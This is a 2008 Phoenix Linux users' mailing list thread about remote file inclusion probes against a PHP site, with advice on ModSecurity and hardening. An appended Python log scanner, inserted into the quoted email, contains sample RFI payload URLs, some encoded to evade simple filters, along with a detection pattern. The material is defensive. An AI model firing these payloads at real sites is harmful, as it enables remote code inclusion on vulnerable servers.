OT: Website Exploits

Lisa Kachold lisakachold at obnosis.com
Wed Dec 3 16:23:09 MST 2008


ModSecurity used to terminally slow down web systems, adding a great deal of load while actually doing little denial and only verbose exploit logging assistance in return, while also opening the system to additional Denial of Service threat conditions. THIS HAS CHANGED; however, there are still some risks to flat implementation of ModSecurity. For instance, you can't really layer good engineering over bad and expect miracles?

ModSecurity Limitations and Caveats:

1) Stateful Request Monitoring - Layer 7 Application Firewall
http://www.modsecurity.org/
http://adeptus-mechanicus.com/codex/apchems/apchems.html
Don't try to run anything but the current versions due to known security risks!

2) Capacity Planning
But beware before playing with ModSecurity! ModSecurity can be exploited itself - since it's easy to DoS, and slows down requests; however, if you have the processing power, use ModEvasive protection also:
http://adeptus-mechanicus.com/codex/apcheme/apcheme.html
http://www.associatedcontent.com/article/6379/about_modsecurity_and_moddosevasive.html

3) Of course a fine Reverse Proxy security setup might also be fun! You have a test network, right?
http://linuxadministration.wordpress.com/2007/09/06/advance-apache-security-mod_proxymod_securitymod_evasive/

4) A complete security appraisal of your current index.php, CMS version, php.ini and Apache version would be in order. Do you KNOW the exploits currently available for your system? I.e., are you running Joomla, Web 2.0, Mambo or another CMS drop-and-deploy application?

Each item, from your kernel, your SSL, Apache, MySQL version and each PHP tool built upon it, has its known security holes. A savvy security systems administrator might do well to know each and play for upgrades or layered tools to mitigate the risk.

Are you using a custom web development binary, or a drop-in yum Apache/PHP, for instance?
Various known issues exist with versions configured right out of the box; what hardening was completed?

www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452

Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona Department of Economic Security, will provide a one hour presentation on forensics.

Date: Wed, 3 Dec 2008 15:48:17 -0700
From: jd at twingeckos.com
To: klsmith2020 at yahoo.com; plug-discuss at lists.plug.phoenix.az.us
Subject: Re: OT: Website Exploits

That is a fairly common tactic. It exploits poor input validation and register globals in PHP.
Do yourself a huge favor and install mod_security (I assume you're using apache?) as an extra measure of security if you haven't already.
On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020 at yahoo.com> wrote:

Hi,

I am working on a website that gets a lot of exploit attempts. They mostly look like this:

  /index.php?display=http://humano.ya.com/mysons/index.htm?

Our code is set to disregard any value that is not expected. I'm wondering if there is a clearing house for reporting this type of stuff. I have the IP address as reported.... if that is accurate.

Thanks in advance!
Keith
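The `display=http://...` request Keith quotes is a remote file inclusion probe against an `include()` fed from a query parameter. As an added example that is not part of this thread, the Python below pulls such attempts out of Apache combined-format access log lines and tallies the client IPs that sent them, which is the figure you would quote when reporting them. The log format and the sample lines (apart from the URL quoted in the thread) are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" access log format (assumption: this is what the site logs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# A parameter value that starts with a remote URL scheme is the RFI signature
# seen in the thread; the scheme is matched case-insensitively.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?)\s*:', re.IGNORECASE)

# Constructed sample traffic: one legitimate request and three probes
# (plain, upper-cased and %-encoded, and double-%-encoded).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Dec/2008:15:20:01 -0700] "GET /index.php?display=http://humano.ya.com/mysons/index.htm? HTTP/1.1" 200 512',
    '198.51.100.9 - - [03/Dec/2008:15:21:14 -0700] "GET /index.php?display=about HTTP/1.1" 200 4096',
    '203.0.113.7 - - [03/Dec/2008:15:22:30 -0700] "GET /index.php?display=HTTP%3A%2F%2Fexample.com%2Fx.txt%3F HTTP/1.1" 200 512',
    '192.0.2.44 - - [03/Dec/2008:15:23:05 -0700] "GET /index.php?display=%2568ttp://example.com/x.txt HTTP/1.1" 404 221',
]


def find_rfi_attempts(lines):
    """Return (client_ip, parameter, decoded_value) for each request whose
    query string carries a parameter value naming a remote URL scheme."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl removes one layer of %-encoding; a second unquote catches
        # values that were encoded twice to slip past a naive "http://" check.
        for param, value in parse_qsl(query, keep_blank_values=True):
            decoded = unquote(value)
            if REMOTE_SCHEME_RE.match(decoded):
                hits.append((m.group("ip"), param, decoded))
    return hits


def sources_by_count(hits):
    """Tally how many probes each client address sent."""
    return Counter(ip for ip, _, _ in hits)


if __name__ == "__main__":
    for ip, count in sources_by_count(find_rfi_attempts(SAMPLE_LOG)).most_common():
        print(f"{ip}\t{count} attempt(s)")
```

The tallied address is whatever Apache recorded as the TCP peer, so behind a reverse proxy it is the proxy's address unless the log format captures the forwarded client.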



      ---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

